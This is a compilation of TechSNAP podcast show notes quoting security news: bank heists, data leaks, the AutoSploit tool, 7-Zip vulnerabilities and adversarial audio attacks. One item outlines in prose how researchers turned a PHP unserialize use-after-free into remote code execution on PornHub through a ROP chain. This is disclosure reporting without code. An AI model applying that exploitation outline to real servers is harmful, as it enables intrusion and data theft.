Show Notes: techsnap.systems/403

The post Keeping Systems Simple | TechSNAP 403 first appeared on Jupiter Broadcasting.

Show Notes: podcast.asknoahshow.com/66

The post We Found Another Spectre, Meltdown Flaw | Ask Noah Show 66 first appeared on Jupiter Broadcasting.

RSS Feeds:

HD Video Feed | MP3 Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

Audio Adversarial Examples

We have constructed targeted audio adversarial examples on speech-to-text transcription neural networks: given an arbitrary waveform, we can make a small perturbation that when added to the original waveform causes it to transcribe as any phrase we choose.

Keylogger Found in Many WordPress Sites

But, in a twist, this particular attack isn’t just interested in mining Monero. While the website’s front-end is digging for cryptocurrencies, the back-end is secretly hosting a keylogger designed to steal unsuspecting users’ login credentials.

Pre-Reqs to using WordPress

• Need root privs, or sudo.
• Install the LAMP stack, or something that equiv.
• Secure your site with SSL: WordPress serves dynamic content and handles user authentication and authorization. TLS/SSL is the technology that allows you to encrypt the traffic from your site so that your connection is secure
• Create a MySQL Database

QubesOS is Re-Architecting

This leads us to a conclusion that, at least for some applications, we would like to be able to achieve better isolation than currently available hypervisors and commodity hardware can provide.

Making Network Authentication Simple

We are a non-profit student organization providing Internet access to ~2000 people living on campus. We manage all the active network equipment, and users simply have access to RJ45 wall sockets and shared Wi-Fi access points. Last year, as we were leaving our historic campus and moving into a freshly built one at Paris-Saclay, we set out to build a more modern and robust network infrastructure for our users.

“Autosploit” tool sparks fears

400 lines of Python code + Shodan + Metasploit equals a whole heap of hand-wringing.

AutoSploit, a new tool released by a “cyber security enthusiast” has done more than spark controversy, however, by combining two well-known tools into an automatic hunting and hacking machine—in much the same way people already could with an hour or two of copy-pasting scripts together.

• New click-to-hack tool

• AutoSploit Github Page

• Use psad to Detect Network Intrusion Attempts

Feedback

• An Easy Kube

• GitHub – portainer/portainer: Simple management UI for Docker

• iSCSI Questions

• What is iSCSI (Internet Small Computer System Interface)?

The post Here Come the Script Kiddies | TechSNAP 354 first appeared on Jupiter Broadcasting.

HD Video Feed | MP3 Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

New password guidelines say everything we thought about passwords is wrong

• No more periodic password changes

• No more imposed password complexity

• Mandatory validation of newly created passwords against a list of commonly-used, expected, or compromised passwords.

• We recommend you use a password manager, use a different password on every login

• Rainbow tables used to convert hashes to passwords

Enterprise hard disks are faster and use more power, but are they more reliable?

• The enterprise disks also use more power: 9W idle and 10W operational, compared to 7.2W idle and 9W operational for comparable consumer disks.

• If you have one or two spindles, that’s no big deal, but each Backblaze rack has 20 “storage pods” with 60 disks each. An extra 2.2kW for an idle rack is nothing to sniff at.

• Other HGST models are also continuing to show impressive longevity, with three 4TB models and one 3TB model both boasting a sub-1 percent annualized failure rate.

Don’t trust OAuth: Why the “Google Docs” worm was so convincing

• Access to all your mail

• access to any of your google hangout chats

• access to all your contacts

• makes a good case for encryption/decryption at the client

• OAuth

Feedback

• Intel AMT bug

• bhyve VGA pass-through see also mailing list post

• Amazing, and keep it up!

• Borg Backup see Borg Documentation

  • Borg demonstration

• inexpensive, managed switches

Round Up:

• Why Security Backdoors are Bad (Common Sense Version)

• How to remote hijack computers using Intel’s insecure chips: Just use an empty login string

• Massive vulnerability in Windows Defender leaves most Windows PCs vulnerable

• NASA wants YOU (to make its Fortran code run faster)

The post All Drives Die | TechSNAP 318 first appeared on Jupiter Broadcasting.

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

Data from connected CloudPets teddy bears leaked and ransomed, exposing kids’ voice messages

• Extortionists Wipe Thousands of Databases, Victims Who Pay Up Get Stiffed

• Spiral Toys xCEO denies voice recordings stolen

• CloudPets left their database exposed publicly to the web without so much as a password to protect it.

• There are references to almost 2.2 million voice recordings of parents and their children exposed by databases that should never have contained production data.

• CloudPets has absolutely no password strength rules

• The CloudPets Twitter account has also been dormant since July last year so combined with the complete lack of response to all communications, it looks like operations have well and truly been shuttered.

Spammers expose their entire operation through bad backups

• Today we release details on the inner workings of a massive, illegal spam operation. The situation presents a tangible threat to online privacy and security as it involves a database of 1.4 billion email accounts combined with real names, user IP addresses, and often physical address. Chances are that you, or at least someone you know, is affected. Spammergate: The Fall of an Empire

• The data from this well-known, but slippery spamming operation, was discovered by Chris Vickery, a security researcher for MacKeeper and shared with Salted Hash, Spamhaus, as well as relevant law enforcement agencies.

• Vickery also discovered thousands of warm-up email accounts used by RCM to skirt anti-spam measures

• RCM’s data breach also exposed 2,199 IP addresses used for public-faced activities; as well as the group’s internal assets. This is in addition to the 60 IP blocks RCM has identified for activities in the past, as well as current and future operations; and the 140 active DNS servers that are rotated frequently.

• Based on campaign logging documents, the data breach also exposed more than 300 active MX records. In just two spreadsheets alone, RCM recorded nearly 100,000 domains used for their campaigns.

• If an offer doesn’t inbox (meaning it is rejected, or otherwise dumped into a spam or junk folder), or a given domain is blacklisted, RCM goes back to a list of thousands of domains and selects another to restart the process.

Feedback

• Using ZFS mirrors on a motherboard without RAID support

• Rack Noise

• Big heatsink
• Vendor
• IP address question
• Changing volume sizes in bacula?

Round Up:

• Vault 7: CIA Hacking Tools Revealed

• Google: We’re hiking bug bounties because finding security flaws is getting tougher

• Xbox, Skype, Outlook, and more recover from Microsoft Account issues

• Secure computing for journalists – use your phone, use iOS

• EFF to Court: Forcing Someone to Unlock and Decrypt Their Phone Violates the Constitution

• Changes to Ragel in Response to the Cloudflare Incident

• Arbitrary code execution in TeX distributions

• Operation Rosehub

The post Bad Boy Backups | TechSNAP 309 first appeared on Jupiter Broadcasting.

We’re in the middle of an epic battle for power in cyberspace & Bruce Schneier breaks it down. PHP gets broken, PornHub gets hacked & the disgruntled employee who wiped the router configs on his way out the door.

Plus great emails, a packed round up & more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

Power in the Age of the Feudal Internet

• “We’re in the middle of an epic battle for power in cyberspace. On one side are the nimble, unorganized, distributed powers such as dissident groups, criminals, and hackers. On the other side are the traditional, organized, institutional powers such as governments and large multinational corporations. During its early days, the Internet gave coordination and efficiency to the powerless. It made them powerful, and seem unbeatable. But now the more traditional institutional powers are winning, and winning big. How these two fare long-term, and the fate of the majority of us that don’t fall into either group, is an open question – and one vitally important to the future of the Internet.”
• “In its early days, there was a lot of talk about the “natural laws of the Internet” and how it would empower the masses, upend traditional power blocks, and spread freedom throughout the world. The international nature of the Internet made a mockery of national laws. Anonymity was easy. Censorship was impossible. Police were clueless about cybercrime. And bigger changes were inevitable. Digital cash would undermine national sovereignty. Citizen journalism would undermine the media, corporate PR, and political parties. Easy copying would destroy the traditional movie and music industries. Web marketing would allow even the smallest companies to compete against corporate giants. It really would be a new world order.”
• “On the corporate side, power is consolidating around both vendor-managed user devices and large personal-data aggregators. It’s a result of two current trends in computing. First, the rise of cloud computing means that we no longer have control of our data. Our e-mail, photos, calendar, address book, messages, and documents are on servers belonging to Google, Apple, Microsoft, Facebook, and so on. And second, the rise of vendor-managed platforms means that we no longer have control of our computing devices. We’re increasingly accessing our data using iPhones, iPads, Android phones, Kindles, ChromeBooks, and so on. Even Windows 8 and Apple’s Mountain Lion are heading in the direction of less user control.”
• “I have previously called this model of computing feudal. Users pledge allegiance to more powerful companies who, in turn, promise to protect them from both sysadmin duties and security threats. It’s a metaphor that’s rich in history and in fiction, and a model that’s increasingly permeating computing today.”
• “Feudal security consolidates power in the hands of the few. These companies act in their own self-interest. They use their relationship with us to increase their profits, sometimes at our expense. They act arbitrarily. They make mistakes.”
• “Government power is also increasing on the Internet. Long gone are the days of an Internet without borders, and governments are better able to use the four technologies of social control: surveillance, censorship, propaganda, and use control. There’s a growing “cyber sovereignty” movement that totalitarian governments are embracing to give them more control – a change the US opposes, because it has substantial control under the current system. And the cyberwar arms race is in full swing, further consolidating government power.”
• “What happened? How, in those early Internet years, did we get the future so wrong?”
• “The truth is that technology magnifies power in general, but the rates of adoption are different. The unorganized, the distributed, the marginal, the dissidents, the powerless, the criminal: they can make use of new technologies faster. And when those groups discovered the Internet, suddenly they had power. But when the already powerful big institutions finally figured out how to harness the Internet for their needs, they had more power to magnify. That’s the difference: the distributed were more nimble and were quicker to make use of their new power, while the institutional were slower but were able to use their power more effectively. So while the Syrian dissidents used Facebook to organize, the Syrian government used Facebook to identify dissidents.”
• “There’s another more subtle trend, one I discuss in my book Liars and Outliers. If you think of security as an arms race between attackers and defenders, technological advances – firearms, fingerprint identification, lockpicks, the radio – give one side or the other a temporary advantage. But most of the time, a new technology benefits the attackers first.”
• “It’s quick vs. strong. To return to medieval metaphors, you can think of a nimble distributed power – whether marginal, dissident, or criminal – as Robin Hood. And you can think of ponderous institutional power – both government and corporate – as the Sheriff of Nottingham.”
• “So who wins? Which type of power dominates in the coming decades? Right now, it looks like institutional power.”
• “This is largely because leveraging power on the Internet requires technical expertise, and most distributed power groups don’t have that expertise. Those with sufficient technical ability will be able to stay ahead of institutional power. Whether it’s setting up your own e-mail server, effectively using encryption and anonymity tools, or breaking copy protection, there will always be technologies that are one step ahead of institutional power. This is why cybercrime is still pervasive, even as institutional power increases, and why organizations like Anonymous are still a social and political force. If technology continues to advance – and there’s no reason to believe it won’t – there will always be a security gap in which technically savvy Robin Hoods can operate.”
• “My main concern is for the rest of us: everyone in the middle. These are people who don’t have the technical ability to evade either the large governments and corporations that are controlling our Internet use, or the criminal and hacker groups who prey on us. These are the people who accept the default configuration options, arbitrary terms of service, NSA-installed back doors, and the occasional complete loss of their data. In the feudal world, these are the hapless peasants. And it’s even worse when the feudal lords – or any powers – fight each other. As anyone watching Game of Thrones knows, peasants get trampled when powers fight: when Facebook, Google, Apple, and Amazon fight it out in the market; when the US, EU, China, and Russia fight it out in geopolitics; or when it’s the US vs. the terrorists or China vs. its dissidents. The abuse will only get worse as technology continues to advance. In the battle between institutional power and distributed power, more technology means more damage. Cybercriminals can rob more people more quickly than criminals who have to physically visit everyone they rob. Digital pirates can make more copies of more things much more quickly than their analog forebears. And 3D printers mean that the data use restriction debate now involves guns, not movies. It’s the same problem as the “weapons of mass destruction” fear: terrorists with nuclear or biological weapons can do a lot more damage than terrorists with conventional explosives.”
• “The more destabilizing the technologies, the greater the rhetoric of fear, and the stronger institutional power will get. This means even more repressive security measures, even if the security gap means that such measures are increasingly ineffective. And it will squeeze the peasants in the middle even more.”
• “Transparency and oversight give us the confidence to trust institutional powers to fight the bad side of distributed power, while still allowing the good side to flourish. For if we are going to entrust our security to institutional powers, we need to know they will act in our interests and not abuse that power. Otherwise, democracy fails.”
• “This won’t be an easy period for us as we try to work these issues out. Historically, no shift in power has ever been easy. Corporations have turned our personal data into an enormous revenue generator, and they’re not going to back down. Neither will governments, who have harnessed that same data for their own purposes. But we have a duty to tackle this problem.”
• “Data is the pollution problem of the information age. All computer processes produce it. It stays around. How we deal with it — how we reuse and recycle it, who has access to it, how we dispose of it, and what laws regulate it — is central to how the information age functions. And I believe that just as we look back at the early decades of the industrial age and wonder how society could ignore pollution in their rush to build an industrial world, our grandchildren will look back at us during these early decades of the information age and judge us on how we dealt with the rebalancing of power resulting from all this new data.”
• “I can’t tell you what the result will be. These are all complicated issues, and require meaningful debate, international cooperation, and innovative solutions. We need to decide on the proper balance between institutional and decentralized power, and how to build tools that amplify what is good in each while suppressing the bad.”

How we broke PHP, hacked PornHub, and earned $20,000

• As we covered a few months ago, PornHub has opened up their new bug bounty program via Hackerone.com
• Now, a group of researchers have collected a $20,000 bounty, and are sharing the details of how they did it
• “We have gained remote code execution on pornhub.com and have earned a $20,000 bug bounty on Hackerone. We were also awarded with $2,000 by the Internet Bug Bounty committee”
• “We have found two use-after-free vulnerabilities in PHP’s garbage collection algorithm. Those vulnerabilities were remotely exploitable over PHP’s unserialize function.”
• “After analyzing the platform we quickly detected the usage of unserialize on the website. Multiple paths (everywhere where you could upload hot pictures and so on) were affected”
• “In all cases a parameter named “cookie” got unserialized from POST data and afterwards reflected via Set-Cookie headers”
• So, whatever data you sent to the website while uploading, was serialized and set as a cookie, which would be unserialized and read back in by each subsequent request. This is how websites maintain state across multiple requests.
• When the researchers modified the POST request to include an a serialized PHP Exception, the PornHub website reacted to the exception
• “This might strike as a harmless information disclosure at first sight, but generally it is known that using user input on unserialize is a bad idea”
• “The core unserializer alone is relatively complex as it involves more than 1200 lines of code in PHP 5.6. Further, many internal PHP classes have their own unserialize methods. By supporting structures like objects, arrays, integers, strings or even references it is no surprise that PHP’s track record shows a tendency for bugs and memory corruption vulnerabilities. Sadly, there were no known vulnerabilities of such type for newer PHP versions like PHP 5.6 or PHP 7, especially because unserialize already got a lot of attention in the past”
• “Hence, auditing it can be compared to squeezing an already tightly squeezed lemon. Finally, after so much attention and so many security fixes its vulnerability potential should have been drained out and it should be secure, shouldn’t it?”
• The implemented a fuzzer, and started running it. Eventually they found a bug in PHP 7, but when they tried it against PornHub, it didn’t work. This suggested that PornHub used PHP 5.6. Running the fuzzer against PHP 5.6 generated more than 1 TB of logs, but no vulnerabilities.
• “Eventually, after putting more and more effort into fuzzing we’ve stumbled upon unexpected behavior again.”
• “A tremendous amount of time was necessary to analyze potential issues. After all, we could extract a concise proof of concept of a working memory corruption bug — a so called use-after-free vulnerability! Upon further investigation we discovered that the root cause could be found in PHP’s garbage collection algorithm, a component of PHP that is completely unrelated to unserialize. However, the interaction of both components occurred only after unserialize had finished its job. Consequently, it was not well suited for remote exploitation. After further analysis, gaining a deeper understanding for the problem’s root causes and a lot of hard work a similar use-after-free vulnerability was found that seemed to be promising for remote exploitation.”
• “Even this promising use-after-free vulnerability was considerably difficult to exploit. In particular, it involved multiple exploitation stages.”
• The article then goes on to explain how they exploited the use-after-free vulnerability in great detail
• Once they had the ability to execute the code they provided, they needed a way to view the output
• “Being able to execute arbitrary PHP code is an important step, but being able to view its output is equally important, unless one wants to deal with side channels to receive responses. So the remaining tricky part was to somehow display the result on Pornhub’s website.”
• “Usually php-cgi forwards the generated content back to the web server so that it’s displayed on the website, but wrecking the control flow that badly creates an abnormal termination of PHP so that its result will never reach the HTTP server. To get around this problem we simply told PHP to use direct unbuffered responses that are usually used for HTTP streaming”
• “Together with our ROP stack which was provided over POST data our payload did the following things:”
  • Created our fake object which was later on passed as a parameter to “setcookie”.
• This caused a call to the provided add_ref function i.e. it allowed us to gain program counter control.
• Our ROP chain then prepared all registers/parameters as discussed.
• Next, we were able to execute arbitrary PHP code by making a call to zend_eval_string.
• Finally, we caused a clean process termination while also fetching the output from the response body.
• “Once running the above code we were in and got a nice view of Pornhub’s ‘/etc/passwd’ file. Due to the nature of our attack we would have also been able to execute other commands or actually break out of PHP to run arbitrary syscalls. However, just using PHP was more convenient at this point. Finally, we dumped a few details about the underlying system and immediately wrote and submitted a report to Pornhub over Hackerone.”
• “We gained remote code execution and would’ve been able to do the following things:”
  • Dump the complete database of pornhub.com including all sensitive user information.
  • Track and observe user behavior on the platform.
• Leak the complete available source code of all sites hosted on the server.
• Escalate further into the network or root the system.
• “It is well-known that using user input on unserialize is a bad idea. In particular, about 10 years have passed since its first weaknesses have become apparent. Unfortunately, even today, many developers seem to believe that unserialize is only dangerous in old PHP versions or when combined with unsafe classes. We sincerely hope to have destroyed this misbelief. Please finally put a nail into unserialize’s coffin so that the following mantra becomes obsolete.”
• “You should never use user input on unserialize. Assuming that using an up-to-date PHP version is enough to protect unserialize in such scenarios is a bad idea. Avoid it or use less complex serialization methods like JSON.”

Ex-Citibank employee wipes router configs and downs entire network

• “Lennon Ray Brown, 38, had been working at Citibank’s Irving, Texas, corporate office since 2012, first as a contractor and later as a staff employee, when he was called in by a manager and reprimanded for poor performance.”
• “At that point, the US Department of Justice said, the rogue employee uploaded a series of commands to Citibank’s Global Control Center routers, deleting the config files for nine of the routers and causing traffic to be re-routed through a set of backup routers. Court documents show that while there was not a complete outage, the re-routing led to “congestion” on the network and at the branch offices.”
• “Brown admits that on December 23, 2013, he issued commands to wipe the configuration files on 10 core routers within Citibank’s internal network. The resulting outage hit both network and phone access to 110 branches nationwide – about 90 per cent of all Citibank branch offices.”
• Brown said the following in a text message to a coworker shortly after the incident:
  • “They was firing me. I just beat them to it. Nothing personal, the upper management need to see what they guys on the floor is capable of doing when they keep getting mistreated. I took one for the team.”
  • “Sorry if I made my peers look bad, but sometimes it take something like what I did to wake the upper management up.”
• Brown admitted the intentional damage charge in February
• Justice Department Announcement
• Brown has been sentenced to 21 months in jail, and a $77,000 fine

Feedback:

• VBulletin Ubuntu Forums Hack

• Kids and Grown Up Networks

• Secure Webmail?

• ZFS snapshot to LUKs External on Linux

Round Up:

• Hijacking Youtube to transmit your Data
• NIST advises against SMS-Based Two-Factor Authentication — PDF
• LastPass: design flaw in communication between privileged and unprivileged components l
• LastPass Security Updates
• GOP delegates suckered into connecting to insecure Wi-Fi hotspots
• Katcr.co: Original KickassTorrents Community Is Back, Without Torrent s
• Tinder safe dating spam uses safety to scam users out of money
• Keys to Chimera crypto ransomware allegedly leaked by rival crime gang
• Pop star asks fans to send their passwords so he can tweet as them. May actually be a violation of the CFAA
• You can’t turn off Cortana in the Windows 10 Anniversary Update
• Vine accidently posts docker image with its source code publicly
• Yahoo ordered to show how it recovered deleted emails
• The sound of dialup, pictured, and explained
• Florida judge: Bitcoins aren’t currency, so state money laws don’t apply

The post Internet Power Struggle | TechSNAP 277 first appeared on Jupiter Broadcasting.

A typo stops a billion dollar bank hack, a vulnerability in 7zip that might surprise you & the best solutions for secure remote network access.

Your great questions, our answers, a packed round up & more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

Attackers compromise banks and steal millions

• Attackers compromised the credentials of Bangladesh Bank (the Country’s central bank), and used those credentials to make SWIFT wire transfers
• “Cyber criminals broke into Bangladesh Bank’s system and in early February tried to make fraudulent transfers totaling $951 million from its account at the Federal Reserve Bank of New York.”
• Using the credentials, they started a wave of transfers. The first four went through, transferring a total of more than $81 million, the largest bank heist in history
• The fifth, was stopped only because of a typo
• “a transfer for $20 million, to a Sri Lankan non-profit organization was held up because the hackers misspelled the name of the NGO, Shalika Foundation. Hackers misspelled “foundation” in the NGO’s name as “fandation”, prompting a routing bank, Deutsche Bank, to seek clarification from the Bangladesh central bank, which stopped the transaction”
• “The details of how the hacking came to light and was stopped before it did more damage have not been previously reported. Bangladesh Bank has billions of dollars in a current account with the Fed, which it uses for international settlements.”
• “The transactions that were stopped totaled $850-$870 million, one of the officials said”
• So if it wasn’t for the typo, the hackers may have made off with almost $1 billion
• “Bangladesh Bank has said it has recovered some of the money that was stolen, and is working with anti-money laundering authorities in the Philippines to try to recover the rest.”
• “More than a month after the attack, Bangladeshi officials are scrambling to trace the money, shore up security and identify weaknesses in their systems. They said there is little hope of ever catching the hackers, and it could take months before the money is recovered, if at all.”
• Additional Coverage
• “Bangladesh’s central bank was vulnerable to hackers because it did not have a firewall and used second-hand, $10 switches to network computers connected to the SWIFT global payment network”
• “The shortcomings made it easier for hackers to break into the Bangladesh Bank system earlier this year and attempt to siphon off nearly $1 billion using the bank’s SWIFT credentials, said Mohammad Shah Alam, head of the Forensic Training Institute of the Bangladesh police’s criminal investigation department.”
• Experts in bank security said that the findings described by Alam were disturbing. “You are talking about an organization that has access to billions of dollars and they are not taking even the most basic security precautions”
• “Two (SWIFT) engineers came and visited the bank after the heist and suggested to upgrade the system”
• “Bangladesh police said earlier this week they had identified 20 foreigners involved in the heist but they appear to be people who received some of the payments, rather than those who initially stole the money.”
• “The SWIFT room is roughly 12 feet by 8 feet, a window-less office located on the eight floor of the bank’s annex building in Dhaka. There are four servers and four monitors in the room”
• “The SWIFT facility should have been walled off from the rest of the network. That could have been done if the bank had used the more expensive, “managed” switches, which allow engineers to create separate networks, said Alam, whose institute includes a cyber-crime division.”
• My kingdom for a vlan…
• Last week, a second bank was hit
• Additional Coverage
• “The second case targeted a commercial bank, Swift spokeswoman Natasha de Teran said, without naming it. It was not immediately clear how much money, if any, was stolen in the second attack.”
• Swift said in a statement that the attackers exhibited a “deep and sophisticated knowledge of specific operational controls” at targeted banks and may have been aided by “malicious insiders or cyber attacks, or a combination of both”.
• “News of a second case comes as law enforcement authorities in Bangladesh and elsewhere investigate the February cyber theft from the Bangladesh central bank account at the New York Federal Reserve Bank. Swift has acknowledged that that scheme involved altering Swift software to hide evidence of fraudulent transfers, but that its core messaging system was not harmed.”
• “In the second case SWIFT said attackers had also used a kind of malware called a “Trojan PDF reader” to manipulate PDF reports confirming the messages in order to hide their tracks.”
• That sounds a lot more sophisticated than the first attack. Of course, it could just be that sophisticated attackers hit an unsophisticated bank, and so did not need to use such techniques, or that they just went undetected, because of the lax security at the first bank
• SWIFT network issues security advisory about malware targetting banks
• “In both instances, the attackers have exploited vulnerabilities in banks funds’ transfer initiation environments, prior to messages being sent over SWIFT. The attackers have been able to bypass whatever primary risk controls the victims have in place, thereby being able to initiate the irrevocable funds transfer process. In a second step, they have found ways to tamper with the statements and confirmations that banks would sometimes use as secondary controls, thereby delaying the victims’ ability to recognise the fraud.”

Cisco TALOS finds vulnerability in 7zip

• “Recently Cisco Talos has discovered multiple exploitable vulnerabilities in 7-Zip. These type of vulnerabilities are especially concerning since vendors may not be aware they are using the affected libraries. This can be of particular concern, for example, when it comes to security devices or antivirus products. 7-Zip is supported on all major platforms, and is one of the most popular archive utilities in-use today. Users may be surprised to discover just how many products and appliances are affected.”
• For example, a number of virus and malware scanners using the 7-Zip library to scan inside various archive formats
• This means an attacker could send you a file, which would automatically be scanned by your virus scanner, which would trigger the exploit
• The Talos article includes a link to a Google search for the 7-Zip license, which you can find embedded in a huge number of open and closed source applications
• “An out-of-bounds read vulnerability exists in the way 7-Zip handles Universal Disk Format (UDF) files. The UDF file system was meant to replace the ISO-9660 file format, and was eventually adopted as the official file system for DVD-Video and DVD-Audio.”
• “Central to 7-Zip’s processing of UDF files is the CInArchive::ReadFileItem method. Because volumes can have more than one partition map, their objects are kept in an object vector. To start looking for an item, this method tries to reference the proper object using the partition map’s object vector and the “PartitionRef” field from the Long Allocation Descriptor. Lack of checking whether the “PartitionRef” field is bigger than the available amount of partition map objects causes a read out-of-bounds and can lead, in some circumstances, to arbitrary code execution.”
• “An exploitable heap overflow vulnerability exists in the Archive::NHfs::CHandler::ExtractZlibFile method functionality of 7-Zip. In the HFS+ file system, files can be stored in compressed form using zlib. There are three different ways of keeping data in that form depending on the size of the data. Data from files whose compressed size is bigger than 3800 bytes is stored in a resource fork, split into blocks.”
• “Block size information and their offsets are kept in a table just after the resource fork header. Prior to decompression, the ExtractZlibFile method reads the block size and its offset from the file. After that, it reads block data into static size buffer “buf”. There is no check whether the size of the block is bigger than size of the buffer “buf”, which can result in a malformed block size which exceeds the mentioned “buf” size. This will cause a buffer overflow and subsequent heap corruption.”
• “Sadly, many security vulnerabilities arise from applications which fail to properly validate their input data. Both of these 7-Zip vulnerabilities resulted from flawed input validation. Because data can come from a potentially untrusted source, data input validation is of critical importance to all applications’ security. Talos has worked with 7-Zip to responsibly disclose, and then patch these vulnerabilities. Users are urged to update their vulnerable versions of 7-Zip to the latest revision, version 16.00, as soon as possible.”
• 2016-03-03 – Vendor Notification
• 2016-05-10 – Public Disclosure

Two large middle eastern banks hit by hackers

• “A massive collection of documents from Qatar National Bank, based in Doha, was leaked and posted online to the whistleblower site Cryptome on April 26. The leaked data, which totals 1.4 GBs, apparently includes internal corporate files and sensitive financial data for QNB’s customers.”
• “Cryptome reports that the leak comprises 15,460 files, containing details, including passwords, PINs and payment card data, for hundreds of thousands of the bank customers’ accounts. Multiple experts have also examined the data, and likewise report that it appears to be legitimate. But Cryptome offered no insights into how the data was obtained, for example, if it was via an external hack attack, or an inside job.”
• “Multiple sources who have reviewed the data dump have also confirmed to ISMG that the data appears to be genuine. One researcher, speaking on condition of anonymity, also confirmed that he had successfully used leaked customer internet banking credentials from the data dump to begin logging in to the customer’s account, purely for research purposes. But he said the bank’s systems then sent a one-time password to the customer’s registered mobile number, which would serve as a defense against any criminals who might now attempt to use the leaked data to commit fraud.”
• Additional Coverage: IBTimes
• “Although analysis of the leaked data remains ongoing, there are reports that it contains additional, unusual information. U.K.-based digital media news site IBTimes, for example, reports that in addition to consumer data, the leaked information also includes documents with information on Qatar’s Al-Thani royal family as well as the broadcaster Al Jazeera, which is partly funded by the same family.”
• “In addition, some leaked folders are marked “Spy” and contain what appear to be intelligence dossiers on individuals, according to IBTimes. Some files contained in the dump are labeled as “MI6” – in apparent reference to the British intelligence agency – with others naming Qatar’s state security bureau, known as the Mukhabarat, as well as French and Polish intelligence agencies, IBTimes reports.”
• “Interestingly, there is also additional data about mainly foreign bank account holders, which includes information such as their Facebook and LinkedIn profiles, along with ‘friends’ associated through those social networks. This data doesn’t appear to have come directly from the bank itself, rather the perpetrator used the data held by the bank to then build up profiles of further targets.”
• A second breach occurred at InvestBank, in the UAE
• Additional Coverage
• “A massive tranche of nearly 10GB of files alleged to be from Sharjah, UAE-based InvestBank appears to have been dumped online by the hacking group “Bozkurtlar” – Turkish for “Gray Wolves” – on May 7. The zip archive released by the attackers appears to contain internal files and sensitive financial documents, including InvestBank customers’ data.”
• “The Bozkurtlar hacker or hacking group appears to have Turkish ties, and also claimed credit for a similar data dump on April 26, involving Doha-based Qatar National Bank. In that case, leaked customer data for QNB was quickly posted online by the Cryptome.org whistleblower site”
• “The dumped data appears to include a massive amount of information tied to InvestBank’s systems, including SQL databases and some backup folders. Speaking on condition of anonymity, one expert who’s reviewed the data says it appears to date from 2011 to September 2015.”
• “Customer data included in the leak includes copies of ID documents, photographs of individuals, documents relating to land purchases – such as stamp papers and financials, as well as bank statements and nearly 100,000 credit card numbers, including expiry dates in clear text. Security researchers, however, note that customer credentials such as account passwords and PINs appear to be encrypted.”
• “The dump also contains comprehensive details on InvestBank’s IT setup, including clear-text credentials for its production systems, switches, routers, virtual machines and Windows servers – many of which appear to have been using easily guessable vendor default passwords. Screenshots of server settings and diagrams of server and data center layouts have also been found in the dump, in addition to details of VPN setups with the bank’s branch offices.”
• “The dump also appears to contain complete details of InvestBank’s Oracle FLEXCUBE core banking solution implementation, including costs, deliverables, scope of work, licensing information and the entire database pertaining to InvestBank’s FLEXCUBE implementation.”
• “In December 2015, a hacker broke into InvestBank’s systems and released records for thousands of customers, after the bank refused to pay the $3 million bitcoin ransom demanded by the attacker”
• InvestBank claims this is not a new hack, but just the old data being fully released
• It is possible the original attacker gave up on trying to ransom or sell the data, and just released it publicly

Feedback:

• Remote access possibilities

• Episode 266 – OwnCloud Cloud Proxy

• Pagekite – The fast, reliable localhost tunneling solution

• Storing client sensitive data

• Dynamic DNS via scp, and remote support for my mother’s computer

• Researchers get United Airlines bug bounty of 1 million air miles. Find out that that has a “street value” of $20,000, and it will be considered income by the IRS, so they donate it to Charity instead.

Round Up:

• Federal Judge Says Internet Archive’s Wayback Machine A Perfectly Legitimate Source Of Evidence
• Backblaze releases their 2016Q1 hard drive reliability stats
• Senators introduce bill to block expansion of FBI hacking authority
• Backwards compatibility layer used to bypass EMET, defeating advanced protections in Windows
• Cisco Adaptive Security Appliance VPN Memory Block Exhaustion Vulnerability
• How do you deal with a petabyte of disks with sensitive data you need to destroy? Basically a wood chipper.
• Internet Speed Test by Netflix
• The “Ping of Death” is back, this time in the Linux Kernel
• Sites Turn to Audio Fingerprinting to Track Users
• Remember back to the last US Presidential Election, and some guy claimed he hacked Mitt Romney’s lawyers and stole his tax records? It was fake, but, you can still go to jail for that
• Microsoft Disables Wi-Fi Sense on Windows 10
• The printer works fine, except on Tuesdays…
• High CPU use by taskhost.exe when Windows 8.1 user name contains “user”
• A kickstarter campaign full of nonsense and false buzzwords. Watch what people promise you
• How the internet works, a story in pictures

The post My Kingdom for a VLAN | TechSNAP 267 first appeared on Jupiter Broadcasting.

How the NSA might be breaking Crypto, fresh zero day exploit against Flash with a twist & Keylogging before computers.

Plus a great batch of your questions, a rocking round-up & much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

How might the NSA be breaking crypto?

• “There have been rumors for years that the NSA can decrypt a significant fraction of encrypted Internet traffic. In 2012, James Bamford published an article quoting anonymous former NSA officials stating that the agency had achieved a “computing breakthrough” that gave them “the ability to crack current public encryption.” The Snowden documents also hint at some extraordinary capabilities: they show that NSA has built extensive infrastructure to intercept and decrypt VPN traffic and suggest that the agency can decrypt at least some HTTPS and SSH connections on demand. However, the documents do not explain how these breakthroughs work, and speculation about possible backdoors or broken algorithms has been rampant in the technical community.”
• “Yesterday at ACM CCS, one of the leading security research venues, we and twelve coauthors presented a paper that we think solves this technical mystery.”
• PDF: Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice
